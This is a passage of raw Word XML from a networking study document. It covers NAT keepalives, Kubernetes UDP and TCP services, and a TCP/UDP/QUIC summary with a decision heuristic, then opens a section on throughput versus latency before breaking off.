    <w:p w14:paraId="1643B814" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1420"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Application must send periodic "keepalive" packets to keep the NAT mapping alive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF99768" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Implications for UDP-based protocols:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083236D8" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1421"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>WebRTC: STUN keepalives every 15–30 seconds to keep NAT bindings alive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096EA994" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1421"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t>QUIC: Periodic pings to prevent NAT timeout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756C5393" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1421"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>VPN (WireGuard): Keepalive option sends empty packets every 25 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CF332D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15.3 Container Networking (Kubernetes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EB1A17" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP services in Kubernetes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5054CEE7" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1422"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Standard: Service type ClusterIP → kube-proxy (iptables or IPVS) → Pod.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609258FF" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1422"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Connection tracking (conntrack) maps established TCP connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696D09BF" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1422"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Works seamlessly for any TCP-based protocol.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171BDFCC" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UDP services in Kubernetes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23654ECE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1423"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Supported but with caveats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008D096F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1423"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Conntrack for UDP uses timeout-based tracking (30-second default).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAF9D93" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1423"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>DNS (CoreDNS): UDP service, works well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153CD75D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1423"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Health checks for UDP services are harder (no "connection successful" indicator).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1ECA40" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1423"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>If backend pod dies: no RST sent (like TCP would). Client may send to dead pod until conntrack entry expires.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A41CD51" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:pict w14:anchorId="09D8F246">
          <v:rect id="_x0000_i5027" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="796E94FB" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16. Summary — The Complete Mental Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22566B5A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6861336F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>┌──────────────────────────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FF1E0F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>│                      APPLICATION REQUIREMENTS                         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D312581" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">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p>
    <w:p w14:paraId="017889AD" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>│   RELIABLE    │    UNRELIABLE    │     RELIABLE + NO HOL BLOCKING   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08467417" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>│   ORDERED     │    UNORDERED     │     MULTIPLEXED                   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E0395A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>│   STREAM      │    DATAGRAMS     │     ENCRYPTED                     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6204EA01" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>│               │                  │                                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71920250" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>│     TCP       │      UDP         │       QUIC                        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096FA669" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">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p>
    <w:p w14:paraId="1B4FBAA0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t>│ HTTP/1.1      │ DNS              │ HTTP/3                            │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB7539B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>│ HTTP/2        │ VoIP/RTP         │ Google services                   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000F4617" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>│ gRPC          │ Online gaming    │ Cloudflare                        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65009F98" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>│ Databases     │ Live streaming   │ Meta                              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F76FBF" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>│ File transfer │ IoT/CoAP         │                                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2686DE96" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>│ Email         │ Metrics/StatsD   │                                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F15DF0F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>│ WebSocket     │ Broadcast/Multicast│                                  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251B0FA1" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>│ SSH           │ DHCP             │                                    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A334A6A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>└───────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┴</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>──────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┴</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBA7D74" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The decision heuristic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596BA6C7" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1424"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Does every byte need to arrive correctly and in order?</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> → TCP (or QUIC).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E9FFC1" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1424"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Is the data real-time where old data is useless?</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> → UDP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59055253" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1424"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Do you need TCP's reliability but hate its HOL blocking?</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> → QUIC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C34115F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1424"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Are you building on HTTP?</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> → TCP (HTTP/1.1, HTTP/2) or UDP (HTTP/3 via QUIC).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348B2D79" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1424"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Do you need multicast?</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> → UDP (TCP is point-to-point only).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5C4B21" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1424"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Is the client extremely constrained (IoT)?</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> → UDP (lighter weight).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BB1877" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1424"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Would you like to define your own reliability semantics?</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> → UDP + custom protocol.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A66127" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fundamental principle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E9D96E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>TCP asks: "Did every byte arrive correctly?" and won't move forward until the answer is yes. UDP asks: "Is this the latest information?" and doesn't care about what came before.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544716A5" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Choose based on which question your application needs answered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035337EC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Throughput and Latency in System Design — In-Depth Technical Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A951368" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. What Throughput and Latency Fundamentally Are</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341638E1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Latency</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> is the time it takes for a single unit of work to travel from start to completion. It measures delay — how long you wait.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5390CDC7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> is the amount of work completed per unit of time. It measures capacity — how much gets done.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7533346A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fundamental distinction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486EC0A4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE1306A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Latency:    "How long does ONE request take?"        → measured in time (ms, μs, ns)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690B2E5E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Throughput: "How many requests complete per second?" → measured in operations/time (RPS, QPS, MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFEC082" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The highway analogy (precise version):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042C3ECE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1425"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Latency:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Time for a single car to drive from city A to city B (30 minutes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307216D0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1425"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Throughput:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Number of cars arriving at city B per hour (6,000 cars/hour).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E20953" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>You can have:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318C6DE0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1426"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Low latency, low throughput:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> A single-lane empty highway (one car arrives quickly, but few cars pass per hour).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735FF11B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1426"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>High latency, high throughput:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> A cargo train (takes 8 hours per trip, but delivers 10,000 tons per trip).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B184A1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1426"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Low latency, high throughput:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> A 10-lane highway with no traffic (many cars arrive quickly). This is the goal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F39FD04" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1426"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>High latency, low throughput:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> A single-lane highway with traffic jams. This is the failure mode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAC44D7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why they're distinct (not inverses):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D9C366" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>A common misconception: "throughput = 1/latency." This is only true for a SINGLE-THREADED, SERIAL system:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A29EAFB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65289199" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Serial system: Throughput = 1 / Latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6066826E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Latency = 10ms → Throughput = 100 ops/sec (one at a time)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A6ACB9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="303D0B3A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Parallel system: Throughput = Parallelism / Latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E477A1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Latency = 10ms, 100 parallel workers → Throughput = 10,000 ops/sec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CE20DF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
